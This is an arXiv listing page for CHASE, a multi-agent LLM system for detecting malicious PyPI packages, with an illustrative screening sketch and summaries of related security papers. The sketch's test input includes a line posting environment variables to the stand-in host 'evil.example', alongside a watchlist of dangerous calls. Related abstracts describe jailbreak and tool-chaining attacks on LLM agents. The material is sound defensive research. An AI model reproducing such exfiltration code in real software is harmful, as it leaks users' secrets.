CHASE: LLM Agents for Dissecting Malicious PyPI Packages
- URL: http://arxiv.org/abs/2601.06838v1
- Date: Sun, 11 Jan 2026 10:06:14 GMT
- Title: CHASE: LLM Agents for Dissecting Malicious PyPI Packages
- Authors: Takaaki Toda, Tatsuya Mori
- Abstract summary: Large Language Models (LLMs) offer promising capabilities for automated code analysis. Their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion. We present CHASE, a high-reliability multi-agent architecture that addresses these limitations.
- Score: 2.384873896423002
- License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
- Abstract: Modern software package registries like PyPI have become critical infrastructure for software development, but are increasingly exploited by threat actors distributing malicious packages with sophisticated multi-stage attack chains. While Large Language Models (LLMs) offer promising capabilities for automated code analysis, their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion, which can lead to missed detections or false alarms. We present CHASE (Collaborative Hierarchical Agents for Security Exploration), a high-reliability multi-agent architecture that addresses these limitations through a Plan-and-Execute coordination model, specialized Worker Agents focused on specific analysis aspects, and integration with deterministic security tools for critical operations. Our key insight is that reliability in LLM-based security analysis emerges not from improving individual model capabilities but from architecting systems that compensate for LLM weaknesses while leveraging their semantic understanding strengths. Evaluation on a dataset of 3,000 packages (500 malicious, 2,500 benign) demonstrates that CHASE achieves 98.4% recall with only 0.08% false positive rate, while maintaining a practical median analysis time of 4.5 minutes per package, making it suitable for operational deployment in automated package screening. Furthermore, we conducted a survey with cybersecurity professionals to evaluate the generated analysis reports, identifying their key strengths and areas for improvement. This work provides a blueprint for building reliable AI-powered security tools that can scale with the growing complexity of modern software supply chains. Our project page is available at https://t0d4.github.io/CHASE-AIware25/
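To make the Plan-and-Execute pattern from the abstract concrete, here is a minimal Python sketch of a coordinator that runs specialized workers over a package's source: one deterministic AST-based scanner and one stubbed semantic worker standing in for an LLM. All names (plan_and_execute, deterministic_worker, semantic_worker, SUSPICIOUS_CALLS) are hypothetical illustrations, not CHASE's actual implementation or API.

```python
# Hypothetical sketch of Plan-and-Execute coordination for package
# screening, in the spirit of the CHASE abstract. Names and the
# watchlist below are assumptions, not the paper's actual design.
import ast
from dataclasses import dataclass, field

# Assumed watchlist of dangerous builtins for the deterministic step.
SUSPICIOUS_CALLS = {"exec", "eval", "__import__", "compile"}

@dataclass
class Finding:
    worker: str
    detail: str

@dataclass
class Report:
    package: str
    findings: list = field(default_factory=list)

def deterministic_worker(source: str) -> list:
    """Deterministic tool: flag calls to known-dangerous builtins via the AST."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append(
                    Finding("ast-scan", f"call to {node.func.id} at line {node.lineno}")
                )
    return findings

def semantic_worker(source: str) -> list:
    """Stub for an LLM worker that judges intent on a focused question.

    A real system would prompt an LLM with the snippet (e.g., "does this
    code exfiltrate data?"); here a crude string heuristic stands in.
    """
    if "requests.post" in source and "os.environ" in source:
        return [Finding("llm-stub", "possible credential exfiltration pattern")]
    return []

def plan_and_execute(package: str, source: str) -> Report:
    """Coordinator: execute a fixed plan of workers, then aggregate findings."""
    plan = [deterministic_worker, semantic_worker]  # the "plan" is static here
    report = Report(package)
    for step in plan:
        report.findings.extend(step(source))
    return report

if __name__ == "__main__":
    sample = (
        "import os, requests\n"
        "requests.post('http://evil.example', data=os.environ)\n"
        "eval('1+1')\n"
    )
    for f in plan_and_execute("demo-pkg", sample).findings:
        print(f"[{f.worker}] {f.detail}")
```

The design choice this illustrates is the abstract's key insight: routing critical checks through deterministic tools (the AST scan) while reserving the LLM for semantic judgment, so a hallucinated LLM answer cannot erase a tool-verified finding.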
Related papers
- LPS-Bench: Benchmarking Safety Awareness of Computer-Use Agents in Long-Horizon Planning under Benign and Adversarial Scenarios [51.52395368061729]
We present LPS-Bench, a benchmark that evaluates the planning-time safety awareness of MCP-based CUAs under long-horizon tasks. Experiments reveal substantial deficiencies in existing CUAs' ability to maintain safe behavior. We propose mitigation strategies to improve long-horizon planning safety in MCP-based CUA systems.
arXiv Detail & Related papers (2026-02-03T08:40:24Z)
- Co-RedTeam: Orchestrated Security Discovery and Exploitation with LLM Agents [57.49020237126194]
Large language models (LLMs) have shown promise in assisting cybersecurity tasks, yet existing approaches struggle with automatic vulnerability discovery and exploitation. We propose Co-RedTeam, a security-aware multi-agent framework designed to mirror real-world red-teaming. Co-RedTeam decomposes vulnerability analysis into coordinated discovery and exploitation stages, enabling agents to plan, execute, validate, and refine actions.
arXiv Detail & Related papers (2026-02-02T14:38:45Z)
- RealSec-bench: A Benchmark for Evaluating Secure Code Generation in Real-World Repositories [58.32028251925354]
Large Language Models (LLMs) have demonstrated remarkable capabilities in code generation, but their proficiency in producing secure code remains a critical, under-explored area. We introduce RealSec-bench, a new benchmark for secure code generation meticulously constructed from real-world, high-risk Java repositories.
arXiv Detail & Related papers (2026-01-30T08:29:01Z)
- Towards Verifiably Safe Tool Use for LLM Agents [53.55621104327779]
Large language model (LLM)-based AI agents extend capabilities by enabling access to tools such as data sources, APIs, search engines, code sandboxes, and even other agents. LLMs may invoke unintended tool interactions and introduce risks, such as leaking sensitive data or overwriting critical records. Current approaches to mitigate these risks, such as model-based safeguards, enhance agents' reliability but cannot guarantee system safety.
arXiv Detail & Related papers (2026-01-12T21:31:38Z)
- Agentic AI for Autonomous Defense in Software Supply Chain Security: Beyond Provenance to Vulnerability Mitigation [0.0]
This paper presents an example of agentic artificial intelligence (AI) for autonomous software supply chain security. It combines large language model (LLM)-based reasoning, reinforcement learning (RL), and multi-agent coordination. Results show that agentic AI can facilitate the transition to self-defending, proactive software supply chains.
arXiv Detail & Related papers (2025-12-29T14:06:09Z)
- An Empirical Study on the Security Vulnerabilities of GPTs [48.12756684275687]
GPTs are customized AI agents built on OpenAI's large language models. We present an empirical study on the security vulnerabilities of GPTs.
arXiv Detail & Related papers (2025-11-28T13:30:25Z)
- ParaVul: A Parallel Large Language Model and Retrieval-Augmented Framework for Smart Contract Vulnerability Detection [43.41293570032631]
ParaVul is a retrieval-augmented framework to improve the reliability and accuracy of smart contract vulnerability detection. We develop Sparse Low-Rank Adaptation (SLoRA) for LLM fine-tuning. We construct a vulnerability contract dataset and develop a hybrid Retrieval-Augmented Generation (RAG) system.
arXiv Detail & Related papers (2025-10-20T03:23:41Z)
- STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents [38.755035623707656]
This paper introduces Sequential Tool Attack Chaining (STAC), a novel multi-turn attack framework that exploits agent tool use. We apply our framework to automatically generate and evaluate 483 STAC cases, featuring 1,352 sets of user-agent-environment interactions. Our evaluations show that state-of-the-art LLM agents, including GPT-4.1, are highly vulnerable to STAC, with attack success rates (ASR) exceeding 90% in most cases.
arXiv Detail & Related papers (2025-09-30T00:31:44Z)
- VulnRepairEval: An Exploit-Based Evaluation Framework for Assessing Large Language Model Vulnerability Repair Capabilities [41.85494398578654]
VulnRepairEval is an evaluation framework anchored in functional Proof-of-Concept exploits. Our framework delivers a comprehensive, containerized evaluation pipeline that enables reproducible differential assessment.
arXiv Detail & Related papers (2025-09-03T14:06:10Z)
- OpenAgentSafety: A Comprehensive Framework for Evaluating Real-World AI Agent Safety [58.201189860217724]
We introduce OpenAgentSafety, a comprehensive framework for evaluating agent behavior across eight critical risk categories. Unlike prior work, our framework evaluates agents that interact with real tools, including web browsers, code execution environments, file systems, bash shells, and messaging platforms. It combines rule-based analysis with LLM-as-judge assessments to detect both overt and subtle unsafe behaviors.
arXiv Detail & Related papers (2025-07-08T16:18:54Z)
- Are AI-Generated Fixes Secure? Analyzing LLM and Agent Patches on SWE-bench [9.229310642804036]
We present the first large-scale security analysis of LLM-generated patches using 20,000+ issues from the SWE-bench dataset. We evaluate patches produced by a standalone LLM (Llama 3.3) and compare them to developer-written patches. We also assess the security of patches generated by three top-performing agentic frameworks (OpenHands, AutoCodeRover, HoneyComb) on a subset of our data.
arXiv Detail & Related papers (2025-06-30T21:10:19Z)
- SEC-bench: Automated Benchmarking of LLM Agents on Real-World Software Security Tasks [11.861657542626219]
SEC-bench is the first fully automated benchmarking framework for evaluating large language model (LLM) agents. Our framework automatically creates high-quality software vulnerability datasets with reproducible artifacts at a cost of only $0.87 per instance. A comprehensive evaluation of state-of-the-art LLM code agents reveals significant performance gaps.
arXiv Detail & Related papers (2025-06-13T13:54:30Z)
- CyberGym: Evaluating AI Agents' Real-World Cybersecurity Capabilities at Scale [45.97598662617568]
We introduce CyberGym, a large-scale benchmark featuring 1,507 real-world vulnerabilities across 188 software projects. We show that CyberGym leads to the discovery of 35 zero-day vulnerabilities and 17 historically incomplete patches. These results underscore that CyberGym is not only a robust benchmark for measuring AI's progress in cybersecurity but also a platform for creating direct, real-world security impact.
arXiv Detail & Related papers (2025-06-03T07:35:14Z)
- Leveraging Large Language Models for Command Injection Vulnerability Analysis in Python: An Empirical Study on Popular Open-Source Projects [5.997074223480274]
Command injection vulnerabilities are a significant security threat in dynamic languages like Python. With the proven effectiveness of Large Language Models (LLMs) in code-related tasks, such as testing, researchers have explored their potential for vulnerability analysis. This study evaluates the potential of LLMs, such as GPT-4, as an alternative approach to automated testing for vulnerability detection.
arXiv Detail & Related papers (2025-05-21T04:14:35Z)
- SeCodePLT: A Unified Platform for Evaluating the Security of Code GenAI [58.29510889419971]
Existing benchmarks for evaluating the security risks and capabilities of code-generating large language models (LLMs) face several key limitations. We introduce a general and scalable benchmark construction framework that begins with manually validated, high-quality seed examples and expands them via targeted mutations. Applying this framework to Python, C/C++, and Java, we build SeCodePLT, a dataset of more than 5.9k samples spanning 44 CWE-based risk categories and three security capabilities.
arXiv Detail & Related papers (2024-10-14T21:17:22Z)
- IRIS: LLM-Assisted Static Analysis for Detecting Security Vulnerabilities [14.188864624736938]
Large language models (LLMs) have shown impressive code generation capabilities, but they cannot perform the complex reasoning over code needed to detect security vulnerabilities. We propose IRIS, a neuro-symbolic approach that systematically combines LLMs with static analysis to perform whole-repository reasoning for security vulnerability detection.
arXiv Detail & Related papers (2024-05-27T14:53:35Z)
- Large Language Models for Cyber Security: A Systematic Literature Review [17.073186844004148]
Large Language Models (LLMs) have opened up new opportunities for leveraging artificial intelligence in a variety of application domains, including cybersecurity. LLMs are being applied to an expanding range of cybersecurity tasks, including vulnerability detection, malware analysis, and network intrusion detection. A significant emerging trend is the use of LLM-based autonomous agents, which represent a paradigm shift from single-task execution to orchestrating complex, multi-step security operations.
arXiv Detail & Related papers (2024-05-08T02:09:17Z)